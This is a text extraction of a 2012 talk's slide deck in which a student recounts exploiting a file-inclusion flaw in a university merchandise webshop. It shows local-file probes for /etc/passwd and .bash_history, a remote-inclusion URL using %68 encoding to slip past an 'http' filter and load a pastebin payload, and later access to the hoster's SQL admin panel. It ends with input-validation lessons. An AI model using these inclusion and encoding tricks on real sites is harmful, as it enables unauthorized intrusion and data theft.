oops
play

Oops! d e How I accidentally the k c a h University's - PowerPoint PPT Presentation

Oops! d e How I accidentally the k c a h University's Merchandising Shop Dan Luedtke <mail@danrl.de> Thu, January 12, 2012 Slide 1 About UniBwM University of the German Federal Armed Forces, Munich ~3700 students in


  1. Oops! d e How I accidentally the k c a h University's Merchandising Shop Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 1

  2. About UniBwM ● University of the German Federal Armed Forces, Munich ● ~3700 students in 2011 ● Corporate Design ● Sells shirts and stuff via student-driven webshop UniBwM Press Archive Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 2

  3. About Me ● Student of Computer Aided Engineering ● Assistant at Network Security department ● find them holes! ● www.danrl.de Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 3

  4. Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 4

  5. static dynamic Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 5

  6. http://www.uni-fashion.de/index.php?inhalt=artikel.php&... Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 6

  7. A closer look That's a filename! http://www.uni-fashion.de/index.php?inhalt= artikel.php &... Filename is used to load dynamic content. Unfortunately, thats some bad kind of brainchild :( Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 7

  8. Behind the scenes Webserver index.php artikel.php Visitor We call this technique File Inclusion Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 8

  9. Escalating ● Let's try some other filenames ● /etc/passwd ● /var/log/messages ● /root/.bash_history Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 9

  10. No success! (that's good from the security point of view) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 10

  11. Remote File Inclusion Webserver index.php artikel.php Attacker Let's create some harmless code to include! evil.php Evil Webserver Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 11

  12. Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 12

  13. Raw Code Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 13

  14. Fail! No success! (that's good from the security point of view) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 14

  15. Difference makes a difference But wait... ...don't these error messages look different? What does that mean? Webserver Error Website Error Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 15

  16. Questions ● Why failed the Remote File Inclusion attack? ● Why do local files generate other errors than remote files? Request “Filtering” index.php Webserver .htaccess “Rules” Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 16

  17. No guts, no glory! =http is filtered Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 17

  18. Fail! =http is filtered Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 18

  19. Enconding issues ● In an URL one can write every character as %<HEX-ASCII> ● Same URL, different writing ● http://uni-fashion.de/index.php?a=bc ● http://uni-fashion.de/index.php?a=%61%62 ● Will the filter catch this one? ● http://uni-fashion.de/index.php?inhalt= %68 ttp://pastebin.com/raw.php?i=XqcNB6hz h as %<HEX-ASCII> Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 19

  20. Bazinga! Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 20

  21. Can you keep a secret? ● New code ● New URL ● Same game WTF? Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 21

  22. A few no-brainers ● Lookup Hoster in WHOIS ● Find URL to Hosters SQL-Adminpanel ● Login in with correct password :) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 22

  23. Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 23

  24. My work here is done... Might be useful :) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 24

  25. Lessons learned ● Always validate every user-based input! ● Seriously, do it! ● Do not fix bad code with filters, better repair your code! ● Never trust encoding! ● Use SSL for your SQL-Admin :) ● I can haz a free T-Shirt now? Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 25

  26. Thanks! Questions? Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 26

Recommend


More recommend